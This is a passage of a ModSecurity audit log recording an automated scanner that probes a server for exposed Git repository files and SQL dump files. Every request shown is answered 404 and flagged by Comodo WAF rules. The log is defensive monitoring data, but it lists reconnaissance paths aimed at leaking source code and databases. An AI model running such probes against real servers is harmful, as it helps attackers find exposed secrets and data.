"117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/config.old"] [unique_id "aFCrzQGFf516NUzzD0B3CwAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.git/config.old"] [unique_id "aFCrzQGFf516NUzzD0B3CwAAAAg"] Stopwatch: 1750117325311638 4018 (- - -) Stopwatch2: 1750117325311638 4018; combined=2473, p1=511, p2=1814, p3=28, p4=31, p5=89, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5348f717-Z-- --7e18f37e-A-- [17/Jun/2025:05:12:05.426219 +0530] aFCrzeTJOk1gXj_qIh4XmAAAAAQ 185.177.72.204 60204 127.0.0.1 7080 --7e18f37e-B-- GET /.git/config~ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7e18f37e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e18f37e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/config~"] [unique_id "aFCrzeTJOk1gXj_qIh4XmAAAAAQ"] Stopwatch: 1750117325422957 3317 (- - -) Stopwatch2: 1750117325422957 3317; combined=1997, p1=414, p2=1478, p3=27, p4=26, p5=52, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7e18f37e-Z-- --e6d81062-A-- [17/Jun/2025:05:12:05.536577 +0530] aFCrzZWbMc1Q3J_M-mhIUAAAAAo 185.177.72.204 60216 127.0.0.1 7080 --e6d81062-B-- GET /.git/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e6d81062-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6d81062-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/db.sql"] [unique_id "aFCrzZWbMc1Q3J_M-mhIUAAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.git/db.sql"] [unique_id "aFCrzZWbMc1Q3J_M-mhIUAAAAAo"] Stopwatch: 1750117325533518 3101 (- - -) Stopwatch2: 1750117325533518 3101; combined=1874, p1=387, p2=1364, p3=18, p4=24, p5=81, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e6d81062-Z-- --d14e6f25-A-- [17/Jun/2025:05:12:05.647596 +0530] aFCrzQGFf516NUzzD0B3DAAAAAg 185.177.72.204 60224 127.0.0.1 7080 --d14e6f25-B-- GET /.git/description HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d14e6f25-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d14e6f25-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/description"] [unique_id "aFCrzQGFf516NUzzD0B3DAAAAAg"] Stopwatch: 1750117325643886 3767 (- - -) Stopwatch2: 1750117325643886 3767; combined=2384, p1=463, p2=1778, p3=34, p4=34, p5=75, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d14e6f25-Z-- --1d6c4b33-A-- [17/Jun/2025:05:12:05.757958 +0530] aFCrzQJ4p5Cdblnjra53kgAAAAI 185.177.72.204 60228 127.0.0.1 7080 --1d6c4b33-B-- GET /.git/dump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1d6c4b33-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d6c4b33-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/dump.sql"] [unique_id "aFCrzQJ4p5Cdblnjra53kgAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.git/dump.sql"] [unique_id "aFCrzQJ4p5Cdblnjra53kgAAAAI"] Stopwatch: 1750117325754970 3031 (- - -) Stopwatch2: 1750117325754970 3031; combined=1772, p1=423, p2=1237, p3=18, p4=22, p5=72, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1d6c4b33-Z-- --d63a8377-A-- [17/Jun/2025:05:12:05.868581 +0530] aFCrzYoVQnPDyHnl9oPTSgAAAAY 185.177.72.204 60244 127.0.0.1 7080 --d63a8377-B-- GET /.git/execute.php HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d63a8377-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d63a8377-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/execute.php"] [unique_id "aFCrzYoVQnPDyHnl9oPTSgAAAAY"] Stopwatch: 1750117325865583 3042 (- - -) Stopwatch2: 1750117325865583 3042; combined=1834, p1=402, p2=1311, p3=18, p4=51, p5=52, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d63a8377-Z-- --379b271f-A-- [17/Jun/2025:05:12:05.981210 +0530] aFCrzdyZ4SMykfn97vy3KAAAAAs 185.177.72.204 60254 127.0.0.1 7080 --379b271f-B-- GET /.git/hooks/post-commit HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --379b271f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --379b271f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/hooks/post-commit"] [unique_id "aFCrzdyZ4SMykfn97vy3KAAAAAs"] Stopwatch: 1750117325978242 3012 (- - -) Stopwatch2: 1750117325978242 3012; combined=1809, p1=384, p2=1327, p3=23, p4=24, p5=50, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --379b271f-Z-- --65167354-A-- [17/Jun/2025:05:12:06.091548 +0530] aFCrzpWbMc1Q3J_M-mhIUgAAAAo 185.177.72.204 60256 127.0.0.1 7080 --65167354-B-- GET /.git/hooks/pre-commit HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --65167354-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --65167354-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/hooks/pre-commit"] [unique_id "aFCrzpWbMc1Q3J_M-mhIUgAAAAo"] Stopwatch: 1750117326088569 3023 (- - -) Stopwatch2: 1750117326088569 3023; combined=1838, p1=396, p2=1332, p3=33, p4=24, p5=53, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --65167354-Z-- --a84c6017-A-- [17/Jun/2025:05:12:06.202013 +0530] aFCrzpVkCcfT-Z8NQYzEnAAAAAc 185.177.72.204 60270 127.0.0.1 7080 --a84c6017-B-- GET /.git/hooks/pre-push HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a84c6017-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --a84c6017-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/hooks/pre-push"] [unique_id "aFCrzpVkCcfT-Z8NQYzEnAAAAAc"] Stopwatch: 1750117326198773 3293 (- - -) Stopwatch2: 1750117326198773 3293; combined=2082, p1=393, p2=1550, p3=31, p4=27, p5=80, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a84c6017-Z-- --ce98712c-A-- [17/Jun/2025:05:12:06.312397 +0530] aFCrztyZ4SMykfn97vy3KQAAAAs 185.177.72.204 60286 127.0.0.1 7080 --ce98712c-B-- GET /.git/index HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ce98712c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce98712c-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/index"] [unique_id "aFCrztyZ4SMykfn97vy3KQAAAAs"] Stopwatch: 1750117326309272 3211 (- - -) Stopwatch2: 1750117326309272 3211; combined=1919, p1=373, p2=1422, p3=33, p4=34, p5=57, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ce98712c-Z-- --6121bb24-A-- [17/Jun/2025:05:12:06.422643 +0530] aFCrzgJ4p5Cdblnjra53lAAAAAI 185.177.72.204 60292 127.0.0.1 7080 --6121bb24-B-- GET /.git/info/exclude HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6121bb24-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --6121bb24-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/info/exclude"] [unique_id "aFCrzgJ4p5Cdblnjra53lAAAAAI"] Stopwatch: 1750117326419723 2964 (- - -) Stopwatch2: 1750117326419723 2964; combined=1663, p1=376, p2=1190, p3=22, p4=22, p5=53, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6121bb24-Z-- --c3ec694d-A-- [17/Jun/2025:05:12:06.533176 +0530] aFCrzpVkCcfT-Z8NQYzEnQAAAAc 185.177.72.204 60296 127.0.0.1 7080 --c3ec694d-B-- GET /.git/logs/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c3ec694d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3ec694d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/logs/HEAD"] [unique_id "aFCrzpVkCcfT-Z8NQYzEnQAAAAc"] Stopwatch: 1750117326529821 3401 (- - -) Stopwatch2: 1750117326529821 3401; combined=2093, p1=455, p2=1538, p3=25, p4=24, p5=51, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c3ec694d-Z-- --0e8d3738-A-- [17/Jun/2025:05:12:06.645597 +0530] aFCrztyZ4SMykfn97vy3KgAAAAs 185.177.72.204 60310 127.0.0.1 7080 --0e8d3738-B-- GET /.git/logs/refs/heads/master HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0e8d3738-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e8d3738-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/logs/refs/heads/master"] [unique_id "aFCrztyZ4SMykfn97vy3KgAAAAs"] Stopwatch: 1750117326642976 2664 (- - -) Stopwatch2: 1750117326642976 2664; combined=1691, p1=329, p2=1257, p3=21, p4=30, p5=53, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0e8d3738-Z-- --2ffe9f1d-A-- [17/Jun/2025:05:12:06.756375 +0530] aFCrzpWbMc1Q3J_M-mhIVAAAAAo 185.177.72.204 60316 127.0.0.1 7080 --2ffe9f1d-B-- GET /.git/logs/refs/remotes/origin/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2ffe9f1d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ffe9f1d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/logs/refs/remotes/origin/HEAD"] [unique_id "aFCrzpWbMc1Q3J_M-mhIVAAAAAo"] Stopwatch: 1750117326752854 3608 (- - -) Stopwatch2: 1750117326752854 3608; combined=2220, p1=480, p2=1636, p3=25, p4=24, p5=54, sr=111, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2ffe9f1d-Z-- --4ce9d96a-A-- [17/Jun/2025:05:12:06.867712 +0530] aFCrzlJfblPUQiSn5r2RUQAAAAA 185.177.72.204 60330 127.0.0.1 7080 --4ce9d96a-B-- GET /.git/objects/ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4ce9d96a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ce9d96a-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/objects/"] [unique_id "aFCrzlJfblPUQiSn5r2RUQAAAAA"] Stopwatch: 1750117326864281 3477 (- - -) Stopwatch2: 1750117326864281 3477; combined=2111, p1=423, p2=1558, p3=24, p4=51, p5=55, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4ce9d96a-Z-- --ffc4eb4f-A-- [17/Jun/2025:05:12:06.977822 +0530] aFCrztyZ4SMykfn97vy3KwAAAAs 185.177.72.204 60334 127.0.0.1 7080 --ffc4eb4f-B-- GET /.git/packed-refs HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ffc4eb4f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffc4eb4f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/packed-refs"] [unique_id "aFCrztyZ4SMykfn97vy3KwAAAAs"] Stopwatch: 1750117326975046 2819 (- - -) Stopwatch2: 1750117326975046 2819; combined=1694, p1=377, p2=1221, p3=22, p4=22, p5=52, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ffc4eb4f-Z-- --4048db1a-A-- [17/Jun/2025:05:12:07.088003 +0530] aFCrz5WbMc1Q3J_M-mhIVQAAAAo 185.177.72.204 60342 127.0.0.1 7080 --4048db1a-B-- GET /.git/refs/ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4048db1a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --4048db1a-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/refs/"] [unique_id "aFCrz5WbMc1Q3J_M-mhIVQAAAAo"] Stopwatch: 1750117327085157 2889 (- - -) Stopwatch2: 1750117327085157 2889; combined=1685, p1=377, p2=1191, p3=21, p4=45, p5=51, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4048db1a-Z-- --4179882c-A-- [17/Jun/2025:05:12:07.198120 +0530] aFCrz1JfblPUQiSn5r2RUgAAAAA 185.177.72.204 60352 127.0.0.1 7080 --4179882c-B-- GET /.git/refs/heads/ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4179882c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --4179882c-H-- 